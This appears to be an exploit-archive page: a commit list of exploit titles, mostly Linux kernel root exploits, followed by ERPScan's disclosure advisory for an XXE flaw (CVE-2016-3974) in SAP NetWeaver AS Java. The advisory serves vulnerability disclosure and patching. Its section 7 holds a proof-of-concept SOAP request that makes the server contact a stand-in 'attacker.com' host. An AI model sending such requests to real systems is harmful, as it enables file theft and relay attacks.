0fe9b46f79
14 new exploits Linux Kernel <= 2.4.22 - 'do_brk' Local Root Exploit (2) Linux Kernel <= 2.4.22 - 'do_brk()' Local Root Exploit (2) Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap' Local Proof of Concept (1) Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap' Local Proof of Concept (2) Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Local Proof of Concept (1) Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Local Proof of Concept (2) Linux Kernel <= 2.4.23 / <= 2.6.0 - 'mremap()' Bound Checking Root Exploit Linux Kernel <= 2.4.23 / <= 2.6.0 - 'mremap()' Bound Checking Root Exploit (3) Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Missing 'do_munmap' Exploit Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Missing 'do_munmap' Exploit (1) Linux Kernel <= 2.4.29-rc2 - uselib() Privilege Elevation Linux Kernel <= 2.4.29-rc2 - 'uselib()' Privilege Elevation (1) Linux Kernel 2.4 - uselib() Privilege Elevation Exploit Linux Kernel 2.4 - uselib() Privilege Elevation Exploit (2) Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit (3) Linux Kernel 2.6.17 <= 2.6.24.1 - vmsplice Local Root Exploit Linux Kernel 2.6.23 <= 2.6.24 - vmsplice Local Root Exploit Linux Kernel 2.6.17 <= 2.6.24.1 - 'vmsplice' Local Root Exploit (2) Linux Kernel 2.6.23 <= 2.6.24 - vmsplice Local Root Exploit (1) Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit (1) Linux Kernel 2.6 UDEV < 141 (Gentoo / Ubuntu 8.10/9.04) - Local Privilege Escalation Exploit Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) - UDEV < 141 Local Privilege Escalation Exploit (2) Linux Kernel 2.x (Redhat) - sock_sendpage() Ring0 Local Root Exploit (1) Linux Kernel 2.x - sock_sendpage() Local Root Exploit (2) Linux Kernel 2.x (Redhat) - 'sock_sendpage()' Ring0 Local Root Exploit (1) Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (2) Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - sock_sendpage() ring0 Root Exploit (1) Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (3) Linux Kernel <= 2.6.30 - atalk_getname() 8-bytes Stack Disclosure Exploit Linux Kernel <= 2.6.30 - 'atalk_getname()' 8-bytes Stack Disclosure Exploit (1) Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit (1) Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit (2) Linux Kernel < 2.6.19 (x86/x64) - udp_sendmsg Local Root Exploit Linux Kernel < 2.6.19 (Debian 4) - udp_sendmsg Local Root Exploit Linux Kernel < 2.6.19 (x86/x64) - udp_sendmsg Local Root Exploit (2) Linux Kernel < 2.6.19 (Debian 4) - 'udp_sendmsg' Local Root Exploit (3) Linux Kernel 2.4 / 2.6 (Fedora 11) - sock_sendpage() Local Root Exploit (2) Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (4) Linux Kernel 2.4 / 2.6 - sock_sendpage() Local Root Exploit (3) Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (5) Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - Pipe.c Privilege Escalation Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - Pipe.c Privilege Escalation (3) Linux Kernel <= 2.6.32 - 'pipe.c' Local Privilege Escalation Vulnerability Linux Kernel <= 2.6.32 - 'pipe.c' Local Privilege Escalation Vulnerability (4) Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full Nelson' Local Privilege Escalation Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation Linux Kernel <= 2.6.37 - Local Kernel Denial of Service Linux Kernel <= 2.6.37 - Local Kernel Denial of Service (1) Linux Kernel < 2.6.37-rc2 - TCP_MAXSEG Kernel Panic DoS Linux Kernel < 2.6.37-rc2 - TCP_MAXSEG Kernel Panic DoS (2) Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - Econet Privilege Escalation Exploit Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit Linux Kernel 2.6.39 <= 3.2.2 (Gentoo / Ubuntu x86/x64) - Mempodipper Local Root (1) Linux Kernel 2.6.39 <= 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper.c' Local Root (1) Linux Kernel 2.0/2.1_ Digital UNIX <= 4.0 D_ FreeBSD <= 2.2.4_ HP HP-UX 10.20/11.0_ IBM AIX <= 3.2.5_ NetBSD 1.2_ Solaris <= 2.5.1 - Smurf Denial of Service Vulnerability Linux Kernel 2.0/2.1 (Digital UNIX <= 4.0 D / FreeBSD <= 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX <= 3.2.5 / NetBSD 1.2 / Solaris <= 2.5.1) - Smurf Denial of Service Vulnerability Linux Kernel <= 2.3_ BSD/OS <= 4.0_ FreeBSD <= 3.2_ NetBSD <= 1.4 - Shared Memory Denial of Service Vulnerability Linux Kernel <= 2.3 (BSD/OS <= 4.0 / FreeBSD <= 3.2 / NetBSD <= 1.4) - Shared Memory Denial of Service Vulnerability Linux Kernel 2.2.12/2.2.14/2.3.99_ RedHat 6.x - Socket Denial of Service Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service Linux Kernel 2.2.x/2.4.0-test1_ SGI ProPack 1.2/1.3 - Capabilities Local Root (sendmail) Vulnerability (1) Linux Kernel 2.2.x/2.4.0-test1_ SGI ProPack 1.2/1.3 - Capabilities Local Root (sendmail <= 8.10.1) Vulnerability (2) Linux Kernel 2.2.x <= 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Local Root 'sendmail' Vulnerability (1) Linux Kernel 2.2.x <= 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Local Root (sendmail <= 8.10.1) Vulnerability (2) Linux Kernel < 3.3.x - 3.7.x (Arch Linux x86_64) - sock_diag_handlers[] Local Root Linux Kernel < 3.3.x - 3.7.x (Arch Linux x86_64) - 'sock_diag_handlers[]' Local Root (1) Linux Kernel <= 3.7.10 (Ubuntu 12.10 x64) - sock_diag_handlers Local Root Exploit Linux Kernel <= 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Local Root Exploit (2) Linux Kernel 2.6.x - SYS_EPoll_Wait Local Integer Overflow Local Root Vulnerability (1) Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow Local Root Vulnerability (1) Linux Kernel 2.6.32 <= 3.x.x (CentOS) - PERF_EVENTS Local Root Exploit Linux Kernel 2.6.32 <= 3.x.x (CentOS) - 'PERF_EVENTS' Local Root Exploit (1) Linux Kernel < 3.8.9 (x86_64) - perf_swevent_init Local Root Exploit Linux Kernel < 3.8.9 (x86_64) - perf_swevent_init Local Root Exploit (2) Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat - Proof of Concept Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat - Proof of Concept (1) Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - Arbitrary Write with CONFIG_X86_X32 Exploit Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Local Root Exploit Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - Arbitrary Write with 'CONFIG_X86_X32' Exploit (2) Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Local Root Exploit (3) Linux Kernel 2.6.x - 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty Linux Kernel 3.3 < 3.8 (Ubuntu/Fedora 18) - SOCK_DIAG Local Root Exploit Linux Kernel 3.3 < 3.8 (Ubuntu/Fedora 18) - SOCK_DIAG Local Root Exploit (3) Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04.(0_1_2) x64) - perf_swevent_init Local Root Exploit Linux Kernel 2.6.x - 'fasync_helper()' Local Privilege Escalation Vulnerability Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04.0/1/2 x64) - perf_swevent_init Local Root Exploit (3) Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation Vulnerability Linux Kernel 2.6.39 <= 3.2.2 (x86/x64) - Mempodipper Local Root (2) Linux Kernel 2.6.39 <= 3.2.2 (x86/x64) - 'Mempodipper.c' Local Root (2) Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs Local Root Shell Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Root Shell Linux Kernel <= 4.3.3 (Ubuntu 14.04/15.10) - overlayfs Local Root Exploit Linux Kernel <= 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Root Exploit (1) Linux Kernel <= 4.3.3 - overlayfs Local Privilege Escalation Linux Kernel <= 4.3.3 - 'overlayfs' Local Privilege Escalation (2) DarkComet Server Remote File Download Exploit (msf) Banshee 2.6.2 - .mp3 Crash PoC IonizeCMS 1.0.8 - (Add Admin) CSRF Yona CMS - (Add Admin) CSRF Joomla Publisher Pro (com_publisher) Component - SQL Injection Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074) Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074) Linux - ecryptfs and /proc/$pid/environ Privilege Escalation Windows - Custom Font Disable Policy Bypass Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063) SAP NetWeaver AS JAVA 7.1 - 7.5 - ctcprotocol Servlet XXE SAP NetWeaver AS JAVA 7.1 - 7.5 - Directory Traversal Radiant CMS 1.1.3 - Mutiple Persistent XSS Vulnerabilities YetiForce CRM < 3.1 - Persistent XSS
211 lines
No EOL
5.7 KiB
Text
Executable file
211 lines
No EOL
5.7 KiB
Text
Executable file
Application: SAP NetWeaver AS JAVA
|
||
|
||
Versions Affected: SAP NetWeaver AS JAVA 7.1 - 7.5
|
||
|
||
Vendor URL: http://SAP.com
|
||
|
||
Bug: XXE
|
||
|
||
Sent: 20.10.2015
|
||
|
||
Reported: 21.10.2015
|
||
|
||
Vendor response: 21.10.2015
|
||
|
||
Date of Public Advisory: 08.03.2016
|
||
|
||
Reference: SAP Security Note 2235994
|
||
|
||
Author: Vahagn Vardanyan (ERPScan)
|
||
|
||
|
||
|
||
Description
|
||
|
||
|
||
1. ADVISORY INFORMATION
|
||
|
||
Title: [ERPSCAN-16-013] SAP NetWeaver AS Java ctcprotocol servlet –
|
||
XXE vulnerability
|
||
|
||
Advisory ID: [ERPSCAN-16-013]
|
||
|
||
Risk: Medium
|
||
|
||
Advisory URL: https://erpscan.com/advisories/erpscan-16-013-sap-netweaver-7-4-ctcprotocol-servlet-xxe/
|
||
|
||
Date published: 08.03.2016
|
||
|
||
Vendors contacted: SAP
|
||
|
||
|
||
2. VULNERABILITY INFORMATION
|
||
|
||
Class: XXE
|
||
|
||
Impact: denial of service
|
||
|
||
Remotely Exploitable: Yes
|
||
|
||
Locally Exploitable: No
|
||
|
||
CVE-2016-3974
|
||
|
||
|
||
CVSS Information
|
||
|
||
CVSS Base Score v3: 6.4 / 10
|
||
|
||
CVSS Base Vector:
|
||
|
||
AV : Attack Vector (Related exploit range) Network (N)
|
||
|
||
AC : Attack Complexity (Required attack complexity) High (H)
|
||
|
||
PR : Privileges Required (Level of privileges needed to exploit) High (H)
|
||
|
||
UI : User Interaction (Required user participation) None (N)
|
||
|
||
S : Scope (Change in scope due to impact caused to components beyond
|
||
the vulnerable component) Unchanged (U)
|
||
|
||
C : Impact to Confidentiality High (H)
|
||
|
||
I : Impact to Integrity High (H)
|
||
|
||
A : Impact to Availability High (H)
|
||
|
||
|
||
|
||
3. VULNERABILITY DESCRIPTION
|
||
|
||
Authorized attacker can use a special request to read files from the
|
||
server and then escalate his or her privileges.
|
||
|
||
|
||
|
||
4. VULNERABLE PACKAGES
|
||
|
||
SAP NetWeaver AS JAVA 7.1 - 7.5
|
||
|
||
Other versions are probably affected too, but they were not checked.
|
||
|
||
|
||
5. SOLUTIONS AND WORKAROUNDS
|
||
|
||
To correct this vulnerability, install SAP Security Note 2235994
|
||
|
||
|
||
|
||
6. AUTHOR
|
||
|
||
Vahagn Vardanyan (ERPScan)
|
||
|
||
|
||
7. TECHNICAL DESCRIPTION
|
||
|
||
|
||
An XML external entity (XXE) vulnerability in the Configuration Wizard
|
||
in SAP NetWeaver Java AS 7.4 allows remote attackers to cause a denial
|
||
of service, conduct SMB Relay attacks, or access arbitrary files via a
|
||
crafted XML request related to the ctcprotocol servlet.
|
||
|
||
PoC
|
||
|
||
|
||
POST /_tc~monitoring~webservice~web/ServerNodesWSService HTTP/1.1
|
||
Content-Type: text/xml
|
||
|
||
<SOAP-ENV:Envelope
|
||
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
|
||
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
|
||
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
|
||
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
|
||
<SOAP-ENV:Body>
|
||
<m:XXX xmlns:m="http://sap.com/monitoring/ws/sn/">
|
||
<url>attacker.com</url>
|
||
</m:XXX>
|
||
</SOAP-ENV:Body>
|
||
</SOAP-ENV:Envelope>
|
||
|
||
|
||
|
||
|
||
8. REPORT TIMELINE
|
||
|
||
Sent: 20.10.2015
|
||
|
||
Reported: 21.10.2015
|
||
|
||
Vendor response: 21.10.2015
|
||
|
||
Date of Public Advisory: 08.03.2016
|
||
|
||
|
||
|
||
|
||
9. REFERENCES
|
||
|
||
https://erpscan.com/advisories/erpscan-16-013-sap-netweaver-7-4-ctcprotocol-servlet-xxe/
|
||
|
||
|
||
10. ABOUT ERPScan Research
|
||
|
||
The company’s expertise is based on the research subdivision of
|
||
ERPScan, which is engaged in vulnerability research and analysis of
|
||
critical enterprise applications. It has achieved multiple
|
||
acknowledgments from the largest software vendors like SAP, Oracle,
|
||
Microsoft, IBM, VMware, HP for discovering more than 400
|
||
vulnerabilities in their solutions (200 of them just in SAP!).
|
||
|
||
ERPScan researchers are proud to have exposed new types of
|
||
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be
|
||
nominated for the best server-side vulnerability at BlackHat 2013.
|
||
|
||
ERPScan experts have been invited to speak, present, and train at 60+
|
||
prime international security conferences in 25+ countries across the
|
||
continents. These include BlackHat, RSA, HITB, and private SAP
|
||
trainings in several Fortune 2000 companies.
|
||
|
||
ERPScan researchers lead the project EAS-SEC, which is focused on
|
||
enterprise application security research and awareness. They have
|
||
published 3 exhaustive annual award-winning surveys about SAP
|
||
security.
|
||
|
||
ERPScan experts have been interviewed by leading media resources and
|
||
featured in specialized info-sec publications worldwide. These include
|
||
Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,
|
||
Heise, and Chinabyte, to name a few.
|
||
|
||
We have highly qualified experts in staff with experience in many
|
||
different fields of security, from web applications and
|
||
mobile/embedded to reverse engineering and ICS/SCADA systems,
|
||
accumulating their experience to conduct the best SAP security
|
||
research.
|
||
|
||
|
||
|
||
11. ABOUT ERPScan
|
||
|
||
ERPScan is the most respected and credible Business Application
|
||
Security provider. Founded in 2010, the company operates globally and
|
||
enables large Oil and Gas, Financial and Retail organizations to
|
||
secure their mission-critical processes. Named as an ‘Emerging Vendor’
|
||
in Security by CRN, listed among “TOP 100 SAP Solution providers” and
|
||
distinguished by 30+ other awards, ERPScan is the leading SAP SE
|
||
partner in discovering and resolving security vulnerabilities. ERPScan
|
||
consultants work with SAP SE in Walldorf to assist in improving the
|
||
security of their latest solutions.
|
||
|
||
ERPScan’s primary mission is to close the gap between technical and
|
||
business security, and provide solutions to evaluate and secure SAP
|
||
and Oracle ERP systems and business-critical applications from both,
|
||
cyber-attacks as well as internal fraud. Usually our clients are large
|
||
enterprises, Fortune 2000 companies and managed service providers
|
||
whose requirements are to actively monitor and manage security of vast
|
||
SAP landscapes on a global scale.
|
||
|
||
We ‘follow the sun’ and function in two hubs, located in the Palo Alto
|
||
and Amsterdam to provide threat intelligence services, agile support
|
||
and operate local offices and partner network spanning 20+ countries
|
||
around the globe. |